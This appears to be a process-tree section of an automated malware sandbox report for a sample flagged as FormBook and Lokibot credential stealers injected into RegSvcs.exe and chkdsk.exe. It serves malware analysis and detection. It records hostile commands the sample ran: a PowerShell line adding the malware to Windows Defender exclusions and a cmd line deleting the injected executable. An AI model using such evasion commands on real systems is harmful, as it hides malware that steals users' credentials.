Commandline:	"C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
Imagebase:	0xc50000
File size:	616'448 bytes
MD5 hash:	6F4CDBC9CAC665D375E1F28138E79428
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 24%, ReversingLabs
Reputation:	low
Has exited:	true

Target ID:	15
Start time:	09:42:07
Start date:	29/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x6a0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Target ID:	16
Start time:	09:42:08
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe"
Imagebase:	0x8b0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	17
Start time:	09:42:08
Start date:	29/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x1c0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	18
Start time:	09:42:08
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	19
Start time:	09:42:08
Start date:	29/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x470000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high
Has exited:	true

Target ID:	20
Start time:	09:42:09
Start date:	29/05/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff633410000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	21
Start time:	09:42:12
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\chkdsk.exe"
Imagebase:	0xba0000
File size:	23'040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Target ID:	22
Start time:	09:42:15
Start date:	29/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0xc50000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	23
Start time:	09:42:15
Start date:	29/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true